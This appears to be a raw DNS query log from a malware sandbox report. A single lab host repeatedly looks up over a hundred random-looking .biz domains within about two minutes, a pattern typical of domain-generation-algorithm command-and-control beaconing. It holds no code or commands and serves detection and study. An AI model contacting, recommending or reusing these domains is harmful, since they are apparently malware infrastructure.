                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.067276001 CEST192.168.2.41.1.1.10xfa6eStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.160675049 CEST192.168.2.41.1.1.10x77c9Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.149418116 CEST192.168.2.41.1.1.10x1d49Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.690341949 CEST192.168.2.41.1.1.10x3baaStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.747225046 CEST192.168.2.41.1.1.10x2185Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.325552940 CEST192.168.2.41.1.1.10xd6cdStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.333462954 CEST192.168.2.41.1.1.10xe756Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.236162901 CEST192.168.2.41.1.1.10x2a95Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.257669926 CEST192.168.2.41.1.1.10x2a95Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.430032015 CEST192.168.2.41.1.1.10x6ebcStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.457879066 CEST192.168.2.41.1.1.10x6ebcStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.950795889 CEST192.168.2.41.1.1.10x70abStandard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.178881884 CEST192.168.2.41.1.1.10xd355Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.702183962 CEST192.168.2.41.1.1.10x29bdStandard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.210357904 CEST192.168.2.41.1.1.10x5bf8Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.238995075 CEST192.168.2.41.1.1.10x5bf8Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.671211958 CEST192.168.2.41.1.1.10x8c21Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.415429115 CEST192.168.2.41.1.1.10xb75aStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.748653889 CEST192.168.2.41.1.1.10xe4e8Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.450957060 CEST192.168.2.41.1.1.10x68f8Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.356120110 CEST192.168.2.41.1.1.10x479bStandard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.373310089 CEST192.168.2.41.1.1.10x8459Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.836406946 CEST192.168.2.41.1.1.10xe6d0Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.014857054 CEST192.168.2.41.1.1.10xbe6aStandard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.316493988 CEST192.168.2.41.1.1.10x775dStandard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.157902956 CEST192.168.2.41.1.1.10x3213Standard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.189524889 CEST192.168.2.41.1.1.10x3213Standard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.747030973 CEST192.168.2.41.1.1.10xd597Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.773009062 CEST192.168.2.41.1.1.10xd597Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.201862097 CEST192.168.2.41.1.1.10x854fStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.324254036 CEST192.168.2.41.1.1.10x35aStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.348458052 CEST192.168.2.41.1.1.10x35aStandard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.911639929 CEST192.168.2.41.1.1.10xb5feStandard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.184242010 CEST192.168.2.41.1.1.10x2d22Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.790656090 CEST192.168.2.41.1.1.10xadeStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.818725109 CEST192.168.2.41.1.1.10xadeStandard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.071192026 CEST192.168.2.41.1.1.10x51d9Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.491797924 CEST192.168.2.41.1.1.10x6832Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.867744923 CEST192.168.2.41.1.1.10x435aStandard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.328155994 CEST192.168.2.41.1.1.10xfdbbStandard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.878613949 CEST192.168.2.41.1.1.10xa7ecStandard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.659229994 CEST192.168.2.41.1.1.10xb5b3Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.675129890 CEST192.168.2.41.1.1.10x2fabStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.179923058 CEST192.168.2.41.1.1.10x379dStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.181010008 CEST192.168.2.41.1.1.10xed19Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.661375999 CEST192.168.2.41.1.1.10x33d6Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.692615986 CEST192.168.2.41.1.1.10x33d6Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.927440882 CEST192.168.2.41.1.1.10x7bf6Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.936163902 CEST192.168.2.41.1.1.10x1203Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.326968908 CEST192.168.2.41.1.1.10x1342Standard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.687215090 CEST192.168.2.41.1.1.10x4276Standard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.180896997 CEST192.168.2.41.1.1.10xe83fStandard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.712219000 CEST192.168.2.41.1.1.10x50a2Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.739110947 CEST192.168.2.41.1.1.10x50a2Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.935528040 CEST192.168.2.41.1.1.10x5927Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.957787037 CEST192.168.2.41.1.1.10x5927Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:20.973753929 CEST192.168.2.41.1.1.10x5927Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.080030918 CEST192.168.2.41.1.1.10xf373Standard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.989650965 CEST192.168.2.41.1.1.10x8c5cStandard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.682863951 CEST192.168.2.41.1.1.10xfda0Standard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.768739939 CEST192.168.2.41.1.1.10x62edStandard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.588457108 CEST192.168.2.41.1.1.10x8d58Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.591133118 CEST192.168.2.41.1.1.10xb02aStandard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.614044905 CEST192.168.2.41.1.1.10xb02aStandard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.614067078 CEST192.168.2.41.1.1.10x8d58Standard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.900058985 CEST192.168.2.41.1.1.10x8dc1Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686944008 CEST192.168.2.41.1.1.10x641bStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.687927008 CEST192.168.2.41.1.1.10x9237Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.707962990 CEST192.168.2.41.1.1.10x9237Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.707995892 CEST192.168.2.41.1.1.10x641bStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.470048904 CEST192.168.2.41.1.1.10x180Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.979340076 CEST192.168.2.41.1.1.10xec9cStandard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314840078 CEST192.168.2.41.1.1.10x2937Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.469049931 CEST192.168.2.41.1.1.10xe229Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.799125910 CEST192.168.2.41.1.1.10xa087Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.973304033 CEST192.168.2.41.1.1.10x8759Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.004970074 CEST192.168.2.41.1.1.10x8759Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.274749041 CEST192.168.2.41.1.1.10x44f0Standard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.042572975 CEST192.168.2.41.1.1.10xa430Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.522382975 CEST192.168.2.41.1.1.10xfbb0Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.709728003 CEST192.168.2.41.1.1.10xdc62Standard query (0)zgapiej.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.195297003 CEST192.168.2.41.1.1.10xe864Standard query (0)jifai.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.273801088 CEST192.168.2.41.1.1.10xa713Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.693806887 CEST192.168.2.41.1.1.10xcbd4Standard query (0)xnxvnn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.764151096 CEST192.168.2.41.1.1.10xb5b2Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.889931917 CEST192.168.2.41.1.1.10x3720Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.582032919 CEST192.168.2.41.1.1.10xc865Standard query (0)ihcnogskt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.582226038 CEST192.168.2.41.1.1.10x667dStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.352750063 CEST192.168.2.41.1.1.10x84c9Standard query (0)kkqypycm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.360260010 CEST192.168.2.41.1.1.10xb7c2Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.890250921 CEST192.168.2.41.1.1.10xd914Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.926620007 CEST192.168.2.41.1.1.10x18c5Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.939327955 CEST192.168.2.41.1.1.10xf643Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:39.778835058 CEST192.168.2.41.1.1.10x5294Standard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.271981955 CEST192.168.2.41.1.1.10x82d0Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.302716017 CEST192.168.2.41.1.1.10xbc0bStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.311815977 CEST192.168.2.41.1.1.10xf3bdStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.320343018 CEST192.168.2.41.1.1.10x8539Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.023031950 CEST192.168.2.41.1.1.10x6c4Standard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.562444925 CEST192.168.2.41.1.1.10xb557Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.343960047 CEST192.168.2.41.1.1.10x2d2Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.352154016 CEST192.168.2.41.1.1.10xc18Standard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.098073959 CEST192.168.2.41.1.1.10x131eStandard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.609992981 CEST192.168.2.41.1.1.10x8796Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.526135921 CEST192.168.2.41.1.1.10x511Standard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.745062113 CEST192.168.2.41.1.1.10xe72dStandard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.183936119 CEST192.168.2.41.1.1.10xb77bStandard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.959109068 CEST192.168.2.41.1.1.10x3156Standard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.320842028 CEST192.168.2.41.1.1.10x905cStandard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.091968060 CEST192.168.2.41.1.1.10x132Standard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.011672974 CEST192.168.2.41.1.1.10xe61eStandard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.503489971 CEST192.168.2.41.1.1.10x2bf2Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.520390034 CEST192.168.2.41.1.1.10x2bf2Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.502993107 CEST192.168.2.41.1.1.10xed25Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.023447037 CEST192.168.2.41.1.1.10xc7d0Standard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.800272942 CEST192.168.2.41.1.1.10x8d5Standard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.299663067 CEST192.168.2.41.1.1.10x4a03Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.163779020 CEST192.168.2.41.1.1.10x7011Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.710436106 CEST192.168.2.41.1.1.10xfaabStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.795047998 CEST192.168.2.41.1.1.10xf01fStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.236814022 CEST192.168.2.41.1.1.10xc8e1Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.255156040 CEST192.168.2.41.1.1.10xc8e1Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.736218929 CEST192.168.2.41.1.1.10x575fStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.404572964 CEST192.168.2.41.1.1.10xf935Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.410911083 CEST192.168.2.41.1.1.10xe0a9Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.420227051 CEST192.168.2.41.1.1.10xa782Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.778232098 CEST192.168.2.41.1.1.10x5f1Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.786683083 CEST192.168.2.41.1.1.10x84f6Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795753002 CEST192.168.2.41.1.1.10x3f82Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.412271976 CEST192.168.2.41.1.1.10x6bbfStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.104495049 CEST192.168.2.41.1.1.10xc7c1Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.802922964 CEST192.168.2.41.1.1.10x5d7fStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.145896912 CEST192.168.2.41.1.1.10xe42fStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.751966953 CEST192.168.2.41.1.1.10xac7fStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.333559036 CEST192.168.2.41.1.1.10x79daStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.695791960 CEST192.168.2.41.1.1.10x63c5Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.721791029 CEST192.168.2.41.1.1.10xac14Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.739372969 CEST192.168.2.41.1.1.10xac14Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.674520969 CEST192.168.2.41.1.1.10x1cedStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.188338041 CEST192.168.2.41.1.1.10x6d2bStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.830955982 CEST192.168.2.41.1.1.10xd64Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.186583042 CEST192.168.2.41.1.1.10x3a83Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.888664007 CEST192.168.2.41.1.1.10xdf0cStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.631711960 CEST192.168.2.41.1.1.10xafd6Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.389748096 CEST192.168.2.41.1.1.10xc8d6Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.411658049 CEST192.168.2.41.1.1.10xc8d6Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.979176044 CEST192.168.2.41.1.1.10xc76dStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.046585083 CEST192.168.2.41.1.1.10x91fcStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.148015022 CEST192.168.2.41.1.1.10xe9aStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.176611900 CEST192.168.2.41.1.1.10x74cdStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.258775949 CEST192.168.2.41.1.1.10x5f0Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:54.067528963 CEST192.168.2.41.1.1.10x8482Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.765467882 CEST192.168.2.41.1.1.10x93ecStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.300477028 CEST192.168.2.41.1.1.10xf9Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
